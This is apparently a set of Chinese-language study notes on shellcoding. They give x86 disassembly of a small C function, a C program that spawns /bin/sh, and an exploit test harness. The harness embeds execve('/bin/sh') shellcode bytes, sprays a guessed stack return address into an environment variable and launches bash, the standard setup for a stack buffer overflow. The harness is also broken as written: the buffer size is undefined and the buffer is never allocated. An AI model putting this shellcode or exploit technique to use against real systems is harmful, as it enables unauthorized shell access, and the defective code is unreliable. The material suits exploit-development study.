shellcoders

C/C++、操作系统(内存管理)、硬件体系结构

or eax,eax		//if (eax<0)
jge label

0x8048430 <triangle>: push %ebp
0x8048431 <triangle+1>: mov %esp, %ebp
0x8048433 <triangle+3>: push %edi
0x8048434 <triangle+4>: push %esi
0x8048435 <triangle+5>: sub $0x30,%esp
0x8048438 <triangle+8>: lea 0xffffffd8(%ebp), %edi
0x804843b <triangle+11>: mov $0x8049508,%esi
0x8048440 <triangle+16>: cld
0x8048441 <triangle+17>: mov $0x30,%esp
0x8048446 <triangle+22>: repz movsl %ds:( %esi), %es:( %edi)
0x8048448 <triangle+24>: mov 0x8(%ebp),%eax
0x804844b <triangle+27>: mov %eax,%edx
0x804844d <triangle+29>: imul 0xc(%ebp),%edx
0x8048451 <triangle+33>: mov %edx,%eax
0x8048453 <triangle+35>: sar $0x1f,%eax
0x8048456 <triangle+38>: shr $0x1f,%eax
0x8048459 <triangle+41>: lea (%eax, %edx, 1), %eax
0x804845c <triangle+44>: sar %eax
0x804845e <triangle+46>: mov %eax,0xffffffd4(%ebp)
0x8048461 <triangle+49>: mov 0xffffffd4(%ebp),%eax
0x8048464 <triangle+52>: mov %eax,%eax
0x8048466 <triangle+54>: add $0x30,%esp
0x8048469 <triangle+57>: pop %esi
0x804846a <triangle+58>: pop %edi
0x804846b <triangle+59> pop %ebp
0x804846c <triangle+60>: ret

int triangle (int width, in height){
int array[5] = {0,1,2,3,4};
int area;
area = width * height/2;
return (area);
}

• 获取shellcode 代码

  // shell.c
  int main(){
  char *name[2];
  name[0] = “/bin/sh”;
  name[1] = 0x0;
  execve(name[0], name, 0x0);
  exit(0);
  }

• 测试地址代码

  #include <stdlib.h>
  #define offset_size 0
  #define buffer_size 
  char sc[] =
  “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”
  “\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”
  “\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
  unsigned long find_start(void) {
  __asm__(“movl %esp,%eax”);
  }
  int main(int argc, char *argv[])
  {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=offset_size, bsize=buffer_size;
  int i;
  if (argc > 1) bsize = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  addr = find_start() - offset;
  printf(“Attempting address: 0x%x\n”, addr);
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
  *(addr_ptr++) = addr;
  ptr += 4;
  for (i = 0; i < strlen(sc); i++)
  *(ptr++) = sc[i];
  buff[bsize - 1] = ‘\0’;
  memcpy(buff,”BUF=”,4);
  putenv(buff);
  system(“/bin/bash”);
  }

  ​